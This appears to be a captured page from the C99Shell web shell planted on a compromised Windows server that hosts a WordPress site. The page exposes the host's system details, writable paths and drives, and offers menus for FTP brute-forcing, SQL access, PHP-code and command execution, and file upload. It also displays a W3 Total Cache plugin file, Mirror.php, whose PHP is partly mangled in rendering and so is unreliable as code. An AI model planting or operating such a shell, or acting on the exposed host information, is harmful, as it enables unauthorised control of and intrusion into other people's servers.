!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Users\DMZ\Desktop\cumbreclima\wp-content\plugins\w3-total-cache\lib\W3\Cdn\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Mirror.php (1.97 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * W3 CDN Mirror Class
 */
if (!defined('ABSPATH')) {
    die();
}

w3_require_once(W3TC_LIB_W3_DIR '/Cdn/Base.php');

/**
 * Class W3_Cdn_Mirror
 */
class W3_Cdn_Mirror extends W3_Cdn_Base {
    
/**
     * PHP5 Constructor
     *
     * @param array $config
     */
    
function __construct($config = array()) {
        
$config array_merge(array(
            
'domain' => array(),
        ), 
$config);

        
parent::__construct($config);
    }

    
/**
     * Uploads files stub
     *
     * @param array $files
     * @param array $results
     * @param boolean $force_rewrite
     * @return boolean
     */
    
function upload($files, &$results$force_rewrite false) {
        
$results $this->_get_results($filesW3TC_CDN_RESULT_OK'OK');

        return 
true;
    }

    
/**
     * Deletes files stub
     *
     * @param array $files
     * @param array $results
     * @return boolean
     */
    
function delete($files, &$results) {
        
$results $this->_get_results($filesW3TC_CDN_RESULT_OK'OK');

        return 
true;
    }

    
/**
     * Tests mirror
     *
     * @param string $error
     * @return bool
     */
    
function test(&$error) {
        if (!
parent::test($error)) {
            return 
false;
        }

        
$results = array();
        
$files = array('' => 'purge_test_' time());

        if (!
$this->purge($files$results) && isset($results[0]['error'])) {
            
$error $results[0]['error'];

            return 
false;
        }

        return 
true;
    }

    
/**
     * Returns array of CDN domains
     *
     * @return array
     */
    
function get_domains() {
        if (!empty(
$this->_config['domain'])) {
            return (array) 
$this->_config['domain'];
        }

        return array();
    }

    
/**
     * How and if headers should be set
     * @return string W3TC_CDN_HEADER_NONE, W3TC_CDN_HEADER_UPLOADABLE, W3TC_CDN_HEADER_MIRRORING
     */
    
function headers_support() {
        return 
W3TC_CDN_HEADER_MIRRORING;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--